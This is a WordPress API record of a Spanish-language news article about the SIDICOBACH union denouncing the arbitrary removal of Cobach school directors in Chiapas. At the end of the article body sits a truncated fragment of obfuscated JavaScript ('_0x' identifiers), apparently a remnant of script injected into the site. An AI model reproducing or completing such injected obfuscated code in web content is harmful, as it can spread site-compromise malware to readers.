{"id":24348,"date":"2025-10-04T03:31:47","date_gmt":"2025-10-04T03:31:47","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24348"},"modified":"2025-10-04T03:31:48","modified_gmt":"2025-10-04T03:31:48","slug":"continua-represion-y-despidos-en-contra-de-integrantes-del-sidicobach","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24348","title":{"rendered":"Contin\u00faa represi\u00f3n y despidos en contra de integrantes del SIDICOBACH"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"411\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000364670.jpg\" alt=\"\" class=\"wp-image-24349\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000364670.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000364670-300x171.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>3 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Directores, autoridades municipales y padres de familia del Colegio de Bachilleres de Chiapas (Cobach) denunciaron una serie de actos de represi\u00f3n y despidos arbitrarios en perjuicio de varios directores de plantel, violando garant\u00edas laborales y procesos de consulta con las comunidades.<\/p>\n\n\n\n<p>Alex Stalin Oca\u00f1a Duque, secretario general del Sindicato de Directores del Cobach (SIDICOBACH), acompa\u00f1ado del presidente municipal de Nicol\u00e1s Ruiz, Adelio Jim\u00e9nez G\u00f3mez, y miembros del comit\u00e9 de padres de familia, acudi\u00f3 a las instalaciones centrales del colegio para exigir audiencia y ser escuchados.<\/p>\n\n\n\n<p>Acus\u00f3 que se dio la remoci\u00f3n sorpresiva del ingeniero Octavio V\u00e1zquez Figueroa, director del Plantel 54 en Nicol\u00e1s Ruiz.<br>Oca\u00f1a Duque, dijo que el despido se ejecut\u00f3 &#8220;de manera arbitraria&#8221; y sin notificaci\u00f3n previa, violando &#8220;el derecho elemental de ser escuchado y la garant\u00eda de audiencia&#8221; del trabajador, quien cuenta con m\u00e1s de 23 a\u00f1os de servicio.<\/p>\n\n\n\n<p>La remoci\u00f3n se llev\u00f3 a cabo el pasado mi\u00e9rcoles, cuando la coordinadora de la zona Centro Frailesca, Aida Guadalupe Jim\u00e9nez, lleg\u00f3 al municipio acompa\u00f1ada del delegado de gobierno de Carranza, para informar del cambio de director sin haber consultado previamente con el comit\u00e9 de padres de familia, considerado la m\u00e1xima autoridad dentro del plantel.<\/p>\n\n\n\n<p>El presidente municipal de Nicol\u00e1s Ruiz, Adelio Jim\u00e9nez G\u00f3mez, expres\u00f3 su sorpresa y malestar por no haber sido notificado.<\/p>\n\n\n\n<p>&#8220;Venimos unidos para escuchar la versi\u00f3n, cu\u00e1l es el motivo de por qu\u00e9 es que hacen el cambio sin tomarnos en cuenta, no como autoridad ni como padres de familia&#8221;, declar\u00f3.<\/p>\n\n\n\n<p>Jim\u00e9nez G\u00f3mez critic\u00f3 que, a pesar de solicitar una reuni\u00f3n con el director general del Cobach, Miguel Prado de los Santos, la respuesta fue que solo ser\u00edan recibidos \u00e9l y el delegado, excluyendo a la comisi\u00f3n conjunta que acudi\u00f3 para buscar una soluci\u00f3n.<\/p>\n\n\n\n<p>Por su parte, Rubicel Ovando Jonap\u00e1, miembro del Comit\u00e9 de Padres de Familia, revel\u00f3 que la asamblea general de padres acord\u00f3 solicitar la reinstauraci\u00f3n del director V\u00e1zquez Figueroa, al considerar que ha sido &#8220;una persona responsable&#8221; durante su gesti\u00f3n.<br>Adem\u00e1s, elaboraron un acta en la que exponen que &#8220;no van a permitir la entrada de la nueva directora que ellos est\u00e1n imponiendo&#8221;.<\/p>\n\n\n\n<p>Alex Stalin Oca\u00f1a Duque alert\u00f3 que este no es un caso aislado, se\u00f1alando situaciones similares en el Plantel 74 Juan Sabines y en Siltepec, comunidades con usos y costumbres espec\u00edficos.<\/p>\n\n\n\n<p>Acus\u00f3 directamente al director general, Miguel Prado de los Santos, y a la coordinadora Aida Jim\u00e9nez de &#8220;abonar a la ingobernabilidad&#8221; y desestabilizar la instituci\u00f3n.<\/p>\n\n\n\n<p>&#8220;Pedimos la intervenci\u00f3n del gobernador del estado, Eduardo Ram\u00edrez, en aras del humanismo que \u00e9l proclama&#8221;, exigi\u00f3 el l\u00edder sindical.<\/p>\n\n\n\n<p>Subray\u00f3 la contradicci\u00f3n entre el discurso estatal y las acciones dentro del Cobach. Anunci\u00f3 que presentar\u00e1n las denuncias ante las instancias correspondientes por la violaci\u00f3n sistem\u00e1tica de los derechos laborales de los directores.<\/p>\n\n\n\n<p>La situaci\u00f3n permanece en un punto muerto, con las autoridades educativas estatales en el centro de las cr\u00edticas por una pol\u00edtica que, seg\u00fan los denunciantes, ignora la voz de las comunidades y atenta contra la estabilidad laboral y el derecho al debido proceso.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 3 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Directores, autoridades municipales y padres de familia del Colegio de Bachilleres de Chiapas (Cobach) denunciaron una serie de actos de represi\u00f3n y despidos arbitrarios en perjuicio de varios directores de plantel, violando garant\u00edas laborales y procesos de consulta con las comunidades. Alex Stalin Oca\u00f1a Duque, secretario &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24349,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24348","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24348"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24348\/revisions"}],"predecessor-version":[{"id":24350,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24348\/revisions\/24350"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24349"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24348"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24348"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}